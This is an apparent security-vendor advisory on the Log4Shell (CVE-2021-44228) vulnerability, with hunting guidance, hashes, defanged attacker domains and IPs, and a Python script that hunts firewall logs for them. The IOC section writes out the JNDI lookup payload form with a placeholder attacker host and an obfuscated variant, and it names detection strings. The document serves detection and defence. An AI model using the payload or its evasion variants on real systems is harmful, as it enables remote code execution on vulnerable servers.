URL: https://itcsecure.com/uncategorized/update-log4shell-cve-2021-44228-apache-log4j-vulnerability/
UPDATE: LOG4SHELL – CVE-2021-44228 – APACHE LOG4J VULNERABILITY

 * December 15, 2021
 * 9:12 am
 * ITC Secure

Priority: Critical

Executive Summary:

ITC Secure is continuing to monitor for any alerts that could indicate an
incident related to the recent Log4j vulnerability. ITC has carried out threat
hunting across the available log sources we ingest into Sentinel for signs of
initial compromise, and has reviewed endpoint activity for the suspicious
process executions that would follow any initial compromise. ITC will continue
to carry out these threat hunting activities and will escalate any findings.

We are conscious that we may not have coverage of all log sources within your
estate. At the time of preparing this report we have therefore provided further
details and IOCs below that your internal network and security teams can use to
assist further investigation.

Specific guidance published by Microsoft can be found in "Guidance for
preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation" on
the Microsoft Security Blog.

Further Guidance at the time of preparing this report:

IOCs:

Attackers deliver the exploit as a Log4j lookup string, typically of the form
${jndi:ldap://<attacker host>/...}, placed in any request field that the
application logs. The User-Agent header is the most common carrier. While user
agent strings are available from different log sources, to detect
CVE-2021-44228 attempts IIS server logs (the cs(User-Agent) field) should be
reviewed for the below strings:
“jndi:ldap”
“Basic/Command/Base64”

The first is the start of the JNDI lookup itself; the second is the URL path
used by the JNDIExploit tool to carry a base64-encoded command for the victim
to run. Note that the lookup can also use rmi://, dns:// and other schemes, and
that attackers obfuscate it with nested lookups (for example
${${lower:j}ndi:...}) and URL encoding, so a literal search for these two
strings will miss some attempts.

If the above strings are found within the IIS logs it is not by itself
indicative that a compromise has occurred, but it does indicate that someone
has attempted to exploit the server. IIS itself does not use Log4j; the risk is
to Java applications that IIS fronts or proxies. If such an application was
vulnerable to CVE-2021-44228 the attempt may have succeeded, and the tell-tale
sign of success is the application server making an outbound LDAP, RMI or HTTP
connection to the host named in the string. Please reach out to the ITC SOC
should you find any reference to these strings in the logs of the targeted
server so that we can provide further investigation.

Hashes:

These SHA-256 hashes have been identified as being involved in the recent Log4j
attacks. If you have the means to search for hashes through anti-virus, EDR or
similar, consider searching for evidence of them within your environment. If
found, contact the ITC SOC for further investigation. If you can block the
hashes, consider doing so, but understand that attackers regularly change their
payloads to avoid detection through these IOCs, so a clean hash search is not
evidence of a clean estate.

8933820cf2769f6e7f1a711e188f551c3d5d3843c52167a34ab8d6eabb0a63ef
6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b
c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a
3f6120ca0ff7cf6389ce392d4018a5e40b131a083b071187bf54c900e2edad26
776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00
8052f5cc4dfa9a8b4f67280a746acbc099319b9391e3b495a27d08fb5f08db81
2b794cc70cb33c9b3ae7384157ecb78b54aaddc72f4f9cf90b4a4ce4e6cf8984
0e574fd30e806fe4298b3cbccb8d1089454f42f52892f87554325cb352646049
19370ef36f43904a57a667839727c09c50d5e94df43b9cfb3183ba766c4eae3d
2a4e636c4077b493868ea696db3be864126d1066cdc95131f522a4c9f5fb3fec
39db1c54c3cc6ae73a09dd0a9e727873c84217e8f3f00e357785fba710f98129
5c46098887e488d91f42c6d9b93b17b2736c9f4cb5a4a1e476c87c0d310a3f28
6370939d4ff51b934b7a2674ee7307ed06111ab3b896a8847d16107558f58e5b
63d43e5b292b806e857470e53412310ad7103432ba3390ecd4f74e432530a8a9
6a8965a0f897539cc06fefe65d1a4c5fa450d002d1a9d5d69d2b48f697ee5c05
715f1f821d028e165bfa750d73505f1a6136184999411300cc88c18ebfa6e8f7
a3f72a73e146834b43dab8833e0a9cfee6d08843a4c23fdf425295e53517afce
b3a6fe5bc3883fd26c682bb6271a700b8a6fe006ad8df6c09cc87530fcd3a778
b55ddbaee7abf1c73570d6543dd108df0580b08f730de299579570c23b3078c0
c154d739cab62e958944bb4ac5ebad6e965a0442a3f1c1d99d56137e3efa8e40
c38f0f809a1d8c50aafc2f13185df1441345f83f6eb4ef9c48270b9bd90c6799
e20806791aeae93ec120e728f892a8850f624ce2052205ddb3f104bbbfae7f80
fe98548300025a46de1e06b94252af601a215b985dad31353596af3c1813efb0

Domains:

ITC has carried out and will continue to carry out threat hunting using the
below domains, which have been identified as being involved with
CVE-2021-44228. Search DNS, web proxy and firewall logs for resolutions of, or
connections to, these domains. Due to the nature of this attack, domains that
host malicious payloads will change frequently to avoid detection or due to
takedowns, so a clean result does not clear a host. Note that leakix[.]net is
the LeakIX internet scanner; hits on it reflect mass scanning rather than a
targeted attack.

x41[.]me
m3[.]wtf
cuminside[.]club
abrahackbugs[.]xyz
pwn[.]af
rce[.]ee
psc4fuel[.]com
rs3c1[.]com
leakix[.]net

IPs:

ITC has carried out and will continue to threat hunt using the below IP
addresses against firewall logs where available. Hunt in both directions. An
inbound hit from a listed address indicates a scanning or exploitation
attempt; several of the ranges below (for example 185.220.100.0/24 and
185.220.101.0/24) are well-known Tor exit relays, so expect many such hits.
An outbound connection from one of your servers to a listed address is far
higher signal: the exploit causes the vulnerable host itself to connect to the
attacker's LDAP, RMI or web server to fetch the payload, so such a flow means
the lookup executed, even if the firewall denied it.

109.237.96[.]124
185.100.87[.]202
213.164.204[.]146
185.220.101[.]146
171.25.193[.]20
178.17.171[.]102
45.155.205[.]233
171.25.193[.]25
171.25.193[.]77
171.25.193[.]78
185.220.100[.]242
185.220.101[.]39
18.27.197[.]252
89.234.182[.]139
104.244.79[.]6
164.52.212[.]196
193.196.53[.]232
121.5.113[.]11
178.176.202[.]121
178.176.203[.]190
197.246.171[.]83
42.192.11[.]41
45.130.229[.]168
18.228.7[.]109
45.33.47[.]240
80.78.254[.]57
176.32.33[.]14
137.184.61[.]190
205.185.115[.]217
104.244.74[.]57
104.244.76[.]170
107.189.12[.]135
116.24.67[.]213
134.122.34[.]28
137.184.102[.]82
122.161.50[.]23
137.184.106[.]119
142.93.34[.]250
143.198.32[.]72
143.198.45[.]117
147.182.167[.]165
147.182.169[.]254
147.182.219[.]9
151.115.60[.]113
159.65.155[.]208
159.65.58[.]66
164.90.199[.]216
167.99.164[.]201
167.99.172[.]213
167.99.172[.]58
178.62.79[.]49
181.214.39[.]2
185.220.101[.]134
185.220.101[.]138
185.220.101[.]141
185.220.101[.]143
185.220.101[.]144
185.220.101[.]145
185.220.101[.]147
185.220.101[.]149
185.220.101[.]154
185.220.101[.]156
185.220.101[.]157
185.220.101[.]158
185.220.101[.]160
185.220.101[.]161
185.220.101[.]163
185.220.101[.]171
185.220.101[.]172
185.220.101[.]175
185.220.101[.]177
185.220.101[.]180
185.220.101[.]181
185.220.101[.]182
185.220.101[.]185
185.220.101[.]186
185.220.101[.]189
185.220.101[.]191
193.189.100[.]203
194.48.199[.]78
195.19.192[.]26
195.254.135[.]76
195.54.160[.]149
23.129.64[.]131
185.38.175[.]132
188.166.122[.]43
188.166.48[.]55
188.166.92[.]228
23.129.64[.]146
23.129.64[.]148
45.153.160[.]131
46.182.21[.]248
54.173.99[.]121
62.102.148[.]69
62.76.41[.]46
68.183.198[.]247
68.183.44[.]143
72.223.168[.]73
81.17.18[.]60
92.63.197[.]53
164.52.53[.]163
185.220.100[.]240
198.98.60[.]19
86.109.208[.]194
41.203.140[.]114
49.7.224[.]217
195.251.41[.]139
189.188.33[.]125

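As an added example covering both the domain and IP lists above (not ITC's
tooling, and not code from the original advisory), the following Python refangs
a defanged list in the form published here and then hunts a few constructed
firewall records in both directions, rating outbound flows from internal hosts
as the high-signal case. The key=value log layout, the sample flows and the
CALLBACK_PORTS set are assumptions; the IOC subset is copied from the lists
above.

```python
"""Refang the advisory's defanged IOCs and hunt firewall logs in both directions.
Added example, not ITC's tooling. IOC_TEXT is a subset of the lists above;
SAMPLE_FIREWALL is constructed and its key=value layout is an assumption."""
import ipaddress
import re

IOC_TEXT = """
Domains:
x41[.]me
m3[.]wtf
IPs:
45.155.205[.]233
185.220.101[.]146
"""

SAMPLE_FIREWALL = """\
2021-12-11T03:14:09Z srcip=185.220.101.146 dstip=10.0.0.5 dstport=443 action=allow
2021-12-11T03:14:10Z srcip=10.0.0.5 dstip=45.155.205.233 dstport=1389 action=allow
2021-12-11T03:14:12Z srcip=10.0.0.5 dstip=203.0.113.5 dsthost=www.example.com dstport=443 action=allow
2021-12-11T03:14:13Z srcip=10.0.0.7 dstip=203.0.113.9 dsthost=cdn.x41.me dstport=80 action=allow
2021-12-11T03:14:14Z srcip=10.0.0.5 dstip=45.155.205.233 dstport=8080 action=deny
"""

# Ports a JNDI lookup commonly dials out to (LDAP, LDAPS, LDAP alt, RMI, DNS). Heuristic only.
CALLBACK_PORTS = {389, 636, 1389, 1099, 53}
_KV = re.compile(r"(\w+)=(\S+)")


def refang(ioc):
    """Turn the defanged form used in the advisory (x41[.]me) back into a usable value."""
    return ioc.strip().replace("[.]", ".")


def load_iocs(text):
    """Split a defanged list into an IP set and a domain set; 'IPs:'-style headers are skipped."""
    ips, domains = set(), set()
    for line in text.splitlines():
        line = refang(line)
        if not line or line.endswith(":"):
            continue
        try:
            ips.add(str(ipaddress.ip_address(line)))
        except ValueError:                  # not an address, so treat it as a domain
            domains.add(line.lower())
    return ips, domains


def _domain_hit(host, domains):
    """True if host equals a listed domain or is a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)


def hunt_firewall(lines, ips, domains):
    """Return findings; outbound hits from internal hosts are the JNDI callback itself."""
    findings = []
    for line in lines:
        kv = dict(_KV.findall(line))
        try:
            src = ipaddress.ip_address(kv["srcip"])
            dst = ipaddress.ip_address(kv["dstip"])
        except (KeyError, ValueError):
            continue                        # blank or not a flow record we can use
        host = kv.get("dsthost", "")
        port = int(kv.get("dstport", 0))
        base = {"time": line.split()[0], "src": str(src), "dst": str(dst),
                "dsthost": host, "dstport": port, "action": kv.get("action")}
        if src.is_private and (str(dst) in ips or _domain_hit(host, domains)):
            # A server reaching out to attacker infrastructure means the lookup already
            # executed; a denied flow still proves that, it only stopped the payload.
            findings.append({**base, "direction": "outbound", "severity": "high",
                             "callback_port": port in CALLBACK_PORTS})
        elif str(src) in ips:
            # Inbound from a listed address is an attempt (many are Tor exits): review it.
            findings.append({**base, "direction": "inbound", "severity": "low",
                             "callback_port": False})
    return findings


if __name__ == "__main__":
    ioc_ips, ioc_domains = load_iocs(IOC_TEXT)
    for finding in hunt_firewall(SAMPLE_FIREWALL.splitlines(), ioc_ips, ioc_domains):
        print(finding)
```

The severity split encodes the point made above: an inbound hit from a listed
address is an attempt and, for the Tor exit ranges, mostly noise, while an
outbound flow from an internal server to a listed address or domain is the
JNDI callback and should be treated as a probable compromise even when the
firewall denied it. Feed the full lists from this advisory into load_iocs as
they appear here; the refang step handles the [.] notation.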